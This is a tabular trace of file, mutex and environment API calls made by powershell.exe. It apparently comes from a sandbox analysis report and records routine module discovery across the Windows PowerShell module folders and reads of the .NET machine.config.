| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\iSCSI, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\iSCSI\iSCSI.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\ISE, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\ISE\ISE.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Kds, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Kds\Kds.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Diagnostics, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Host, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Security, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\NetAdapter, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\NetAdapter\NetAdapter.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\NetConnection, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\NetConnection\NetConnection.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\NetEventPacketCapture, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\NetLbfo\NetLbfo.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSScheduledJob, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflow, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflowUtility, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\ScheduledTasks, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\ScheduledTasks\ScheduledTasks.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\SecureBoot, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\SecureBoot\SecureBoot.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\SmbShare, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\SmbShare\SmbShare.psd1, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, size = 4096, size_out = 1528 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, size = 520, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, size = 4096, size_out = 1509 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, size = 539, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, size = 4096, size_out = 2756 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, size = 316, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, size = 4096, size_out = 737 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Modules.psd1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, size = 4096, size_out = 4096 |
|
8 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, size = 4096, size_out = 3215 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, size = 4096, size_out = 0 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.config, type = file_attributes |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 43, size_out = 43 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 9, size_out = 9 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 11, size_out = 11 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 3483 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 0 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoloadingCacheMaintenance |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadLine.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtilsHelper.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Appx\Appx.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BranchCache\BranchCache.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender\Defender.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DnsClient\DnsClient.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\EventTracingManagement\EventTracingManagement.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\International\International.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Kds\Kds.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\MMAgent\MMAgent.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\MsDtc\MsDtc.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetAdapter\NetAdapter.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetConnection\NetConnection.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\NetEventPacketCapture.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetLbfo\NetLbfo.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetNat\NetNat.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetQos\NetQos.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSecurity\NetSecurity.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetTCPIP\NetTCPIP.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkConnectivityStatus\NetworkConnectivityStatus.psd1, type = file_attributes |
|
1 | |
